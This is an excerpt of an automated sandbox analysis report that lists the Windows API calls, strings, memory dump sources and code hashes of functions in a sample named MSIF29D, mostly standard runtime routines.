                                                                                                                                                                                                                                                                      • Opcode ID: c4deb961e50d3c65f86d7c5b0aaa82eda7e992871d3de03cf793fa4a97e3cdd6
                                                                                                                                                                                                                                                                      • Instruction ID: 8d9be8e642f88c1b67982806c95d2358685ed8aa15e497bcd0a5c7b55df80900
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c4deb961e50d3c65f86d7c5b0aaa82eda7e992871d3de03cf793fa4a97e3cdd6
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA418634E0020D9BCF14DF58CC85A9EBBB6EF45324F188156FA149B391D735EA05DB92
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00FE7408,00FE3841,0000000C,?,00000000,00000000,?,00FE7632,00000021,FlsSetValue,00FFBD58,00FFBD60,?), ref: 00FE73BC
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                      • API String ID: 3664257935-537541572
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 00FBB531
• std::_Lockit::_Lockit.LIBCPMT ref: 00FBB54F
• std::_Lockit::~_Lockit.LIBCPMT ref: 00FBB577
• LocalAlloc.KERNEL32(00000040,0000000C,00000000,8F6E4A30,?,00000000,00000000), ref: 00FBB5CF
• std::_Facet_Register.LIBCPMT ref: 00FBB6B7
• std::_Lockit::~_Lockit.LIBCPMT ref: 00FBB6E1
Memory Dump Source
• Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
• String ID:
• API String ID: 3931714976-0
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 00FBB731
• std::_Lockit::_Lockit.LIBCPMT ref: 00FBB74F
• std::_Lockit::~_Lockit.LIBCPMT ref: 00FBB777
• LocalAlloc.KERNEL32(00000040,00000008,00000000,8F6E4A30,?,00000000,00000000), ref: 00FBB7CF
• std::_Facet_Register.LIBCPMT ref: 00FBB863
• std::_Lockit::~_Lockit.LIBCPMT ref: 00FBB88D
Memory Dump Source
• Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
• String ID:
• API String ID: 3931714976-0
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
Similarity
• API ID: __freea$__alloca_probe_16
• String ID: a/p$am/pm
• API String ID: 3509577899-3206640213
APIs
• GetLastError.KERNEL32(?,?,00FD596F,00FD4900,00FD358F), ref: 00FD5986
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00FD5994
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00FD59AD
• SetLastError.KERNEL32(00000000,00FD596F,00FD4900,00FD358F), ref: 00FD59FF
Memory Dump Source
• Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetTempFileNameW.KERNEL32(?,URL,00000000,?,8F6E4A30,?,00000004), ref: 00FB3294
                                                                                                                                                                                                                                                                      • MoveFileW.KERNEL32(?,00000000), ref: 00FB354A
                                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 00FB3592
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB1A70: LocalAlloc.KERNEL32(00000040,80000022), ref: 00FB1AF7
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB1A70: LocalFree.KERNEL32(7FFFFFFE), ref: 00FB1B7D
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB2E60: LocalFree.KERNEL32(?,8F6E4A30,?,?,00FF3C40,000000FF,?,00FB1242,8F6E4A30,?,?,00FF3C75,000000FF), ref: 00FB2EB1
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: FileLocal$Free$AllocDeleteMoveNameTemp
                                                                                                                                                                                                                                                                      • String ID: URL$url
                                                                                                                                                                                                                                                                      • API String ID: 853893950-346267919
                                                                                                                                                                                                                                                                      • Opcode ID: 863164d85df8734386a4db873272a2f5bdae2185e1adc7c5cb45e68267cec0b8
                                                                                                                                                                                                                                                                      • Instruction ID: 1ed81d2f115f2e0b3e85bd087be22e2cd95282907ed803fae90fbde824f294b0
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 863164d85df8734386a4db873272a2f5bdae2185e1adc7c5cb45e68267cec0b8
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78C19830D14268DADB25DF29CC98BDDBBB4BF14304F1442D9D009A7291EBB86B88DF91
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00FB3735
                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00FF4215,000000FF), ref: 00FB381A
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB2310: GetProcessHeap.KERNEL32 ref: 00FB2365
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB46F0: FindResourceExW.KERNEL32(00000000,00000006,?,00000000,00000000,?,?,?,?,00FB3778,-00000010,?,?,?,00FF4215,000000FF), ref: 00FB4736
                                                                                                                                                                                                                                                                      • _wcschr.LIBVCRUNTIME ref: 00FB37C6
                                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,00FF4215,000000FF), ref: 00FB37DB
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: DirectoryErrorFindHeapLastLibraryLoadProcessResourceSystem_wcschr
                                                                                                                                                                                                                                                                      • String ID: ntdll.dll
                                                                                                                                                                                                                                                                      • API String ID: 3941625479-2227199552
                                                                                                                                                                                                                                                                      • Opcode ID: 540940d0160a303f3073386da294a0febdfcc1277b03cc75b90317627d34406c
                                                                                                                                                                                                                                                                      • Instruction ID: ea45f99d583147ce09e5b17e4e5bfa746d74997fe05c87d6ca8af296539d4c64
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 540940d0160a303f3073386da294a0febdfcc1277b03cc75b90317627d34406c
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD41D271A40609AFDB10DF69CC59BEEB7A4FF04310F144629F916972C1EBB4AA04DF91
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB1A20: LocalFree.KERNEL32(?), ref: 00FB1A42
                                                                                                                                                                                                                                                                        • Part of subcall function 00FD3E5A: RaiseException.KERNEL32(E06D7363,00000001,00000003,00FB1434,?,?,00FBD341,00FB1434,01008B5C,?,00FB1434,?,00000000), ref: 00FD3EBA
                                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(8F6E4A30,8F6E4A30,?,?,00000000,00FF4981,000000FF), ref: 00FB62EB
                                                                                                                                                                                                                                                                        • Part of subcall function 00FD2C98: EnterCriticalSection.KERNEL32(0100DD3C,?,?,?,00FB23B6,0100E638,8F6E4A30,?,?,00FF3D6D,000000FF), ref: 00FD2CA3
                                                                                                                                                                                                                                                                        • Part of subcall function 00FD2C98: LeaveCriticalSection.KERNEL32(0100DD3C,?,?,?,00FB23B6,0100E638,8F6E4A30,?,?,00FF3D6D,000000FF), ref: 00FD2CE0
                                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00FB62B0
                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00FB62B7
                                                                                                                                                                                                                                                                        • Part of subcall function 00FD2C4E: EnterCriticalSection.KERNEL32(0100DD3C,?,?,00FB2427,0100E638,00FF6B40), ref: 00FD2C58
                                                                                                                                                                                                                                                                        • Part of subcall function 00FD2C4E: LeaveCriticalSection.KERNEL32(0100DD3C,?,?,00FB2427,0100E638,00FF6B40), ref: 00FD2C8B
                                                                                                                                                                                                                                                                        • Part of subcall function 00FD2C4E: RtlWakeAllConditionVariable.NTDLL ref: 00FD2D02
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeave$AddressConditionCurrentExceptionFreeHandleLocalModuleProcProcessRaiseVariableWake
                                                                                                                                                                                                                                                                      • String ID: IsWow64Process$kernel32
                                                                                                                                                                                                                                                                      • API String ID: 1333104975-3789238822
                                                                                                                                                                                                                                                                      • Opcode ID: 1f7660742885ab587b46e38ef72bf6fd82e502348c4adc55e19472a9f78bbd9a
                                                                                                                                                                                                                                                                      • Instruction ID: 7c0a0152d97d2e93c8bdc943986aa47383957d868cf27187ac3f9482c555967d
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f7660742885ab587b46e38ef72bf6fd82e502348c4adc55e19472a9f78bbd9a
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D21A171D042059BDB21EF95DD06B9DB7A8EB08720F140629F961E72C0DB796900EF51
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Mpunct$GetvalsH_prolog3
                                                                                                                                                                                                                                                                      • String ID: $+xv
                                                                                                                                                                                                                                                                      • API String ID: 2204710431-1686923651
                                                                                                                                                                                                                                                                      • Opcode ID: ffd3b11bc6012dfc9aa57b0153aa9e34ac9be129489e7bfafa50113e5d35ffc2
                                                                                                                                                                                                                                                                      • Instruction ID: d2ef6acfb7ce0fac60fec98ac85ce3a120aa6e5be791c2d1cd7e2031c0169055
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ffd3b11bc6012dfc9aa57b0153aa9e34ac9be129489e7bfafa50113e5d35ffc2
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5221F4B1804B936ED725DF74C881B7BBEF8AB09301F04495EE059C7A42D738E602DB90
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(8F6E4A30,8F6E4A30,?,?,00000000,00FF4981,000000FF), ref: 00FB62EB
                                                                                                                                                                                                                                                                        • Part of subcall function 00FD2C98: EnterCriticalSection.KERNEL32(0100DD3C,?,?,?,00FB23B6,0100E638,8F6E4A30,?,?,00FF3D6D,000000FF), ref: 00FD2CA3
                                                                                                                                                                                                                                                                        • Part of subcall function 00FD2C98: LeaveCriticalSection.KERNEL32(0100DD3C,?,?,?,00FB23B6,0100E638,8F6E4A30,?,?,00FF3D6D,000000FF), ref: 00FD2CE0
                                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00FB62B0
                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00FB62B7
                                                                                                                                                                                                                                                                        • Part of subcall function 00FD2C4E: EnterCriticalSection.KERNEL32(0100DD3C,?,?,00FB2427,0100E638,00FF6B40), ref: 00FD2C58
                                                                                                                                                                                                                                                                        • Part of subcall function 00FD2C4E: LeaveCriticalSection.KERNEL32(0100DD3C,?,?,00FB2427,0100E638,00FF6B40), ref: 00FD2C8B
                                                                                                                                                                                                                                                                        • Part of subcall function 00FD2C4E: RtlWakeAllConditionVariable.NTDLL ref: 00FD2D02
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                       • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                       • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                       • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                       • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeave$AddressConditionCurrentHandleModuleProcProcessVariableWake
                                                                                                                                                                                                                                                                      • String ID: IsWow64Process$kernel32
                                                                                                                                                                                                                                                                      • API String ID: 2056477612-3789238822
                                                                                                                                                                                                                                                                      • Opcode ID: 5344650cbab7f3560958dbc3f13d541c5d8f563134f6a9051d2a077eb000511b
                                                                                                                                                                                                                                                                      • Instruction ID: 28cc743e6c9959b84ab40bdaa53f9321f4b2b2d3b0314249b28806883af23bd9
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5344650cbab7f3560958dbc3f13d541c5d8f563134f6a9051d2a077eb000511b
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 70119072D04718DFDB21CF54ED05BA9B7A8EB18720F04066AE825E37C0EB7A6900DB51
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00FD6AA3,?,?,0100DDCC,00000000,?,00FD6BCE,00000004,InitializeCriticalSectionEx,00FF97E8,InitializeCriticalSectionEx,00000000), ref: 00FD6A72
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                       • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                       • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                       • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                       • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                                                                                                                                      • API String ID: 3664257935-2084034818
                                                                                                                                                                                                                                                                      • Opcode ID: cbfca6227021c31338be2b86b4e614bf6fe75c3b46e36ea3656ec2b2aedc4c48
                                                                                                                                                                                                                                                                      • Instruction ID: b07a8fbb6f4e6dd0104b962329500c605bc1ac1005f611f580a89eeb271ea055
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cbfca6227021c31338be2b86b4e614bf6fe75c3b46e36ea3656ec2b2aedc4c48
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8110A32E04725ABCF229B689C4076973999F02770F184152F954FB3C0D774ED00E6D5
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,8F6E4A30,?,?,00000000,00FF6A6C,000000FF,?,00FE2DC1,?,?,00FE2D95,?), ref: 00FE2E23
                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00FE2E35
                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,00FF6A6C,000000FF,?,00FE2DC1,?,?,00FE2D95,?), ref: 00FE2E57
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                       • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                       • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                       • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                       • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                      • Opcode ID: fc582bb4909d2ef8e6e512ad102de43a736d10a4d05e4a098a08d5ba466809a5
                                                                                                                                                                                                                                                                      • Instruction ID: 6290fb177e09e7a3fad43010bb1478fa9cbb07e55971bf567ccf6ca1fd546b55
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fc582bb4909d2ef8e6e512ad102de43a736d10a4d05e4a098a08d5ba466809a5
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0701A27290866DABDB129F40CC05FBFBBBCFF04B20F000525F811A22E0DB759900DA80
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 00FE6E40
                                                                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 00FE6F01
                                                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 00FE6F68
                                                                                                                                                                                                                                                                        • Part of subcall function 00FE5BDC: HeapAlloc.KERNEL32(00000000,00000000,00FE3841,?,00FE543A,?,00000000,?,00FD6CE7,00000000,00FE3841,00000000,?,?,?,00FE363B), ref: 00FE5C0E
                                                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 00FE6F7D
                                                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 00FE6F8D
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                       • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                       • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                       • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                       • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1096550386-0
                                                                                                                                                                                                                                                                      • Opcode ID: 26c58f344178fc6a6cf9566351ce7163afb1614decf8ae463a15afa47d1c03f0
                                                                                                                                                                                                                                                                      • Instruction ID: c4bafa5ff1110fa48fa63aa840039f73b7fb03e6eb177f474ce659072bd6f9f7
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 26c58f344178fc6a6cf9566351ce7163afb1614decf8ae463a15afa47d1c03f0
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A851B472A0028AAFEF219F66DC41EBF36A9EF647A0B150129FD04D6251F735DC10A7A1
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FBB8DD
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FBB900
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FBB928
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FBB98D
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FBB9B7
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                       • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                       • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                       • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                       • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 459529453-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,?,75474450,00FB5646,?,?,?,?,?), ref: 00FB5898
                                                                                                                                                                                                                                                                      Strings
Memory Dump Source
• Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                                                                                                                                      • String ID: Call to ShellExecuteEx() returned:$Last error=$false$true
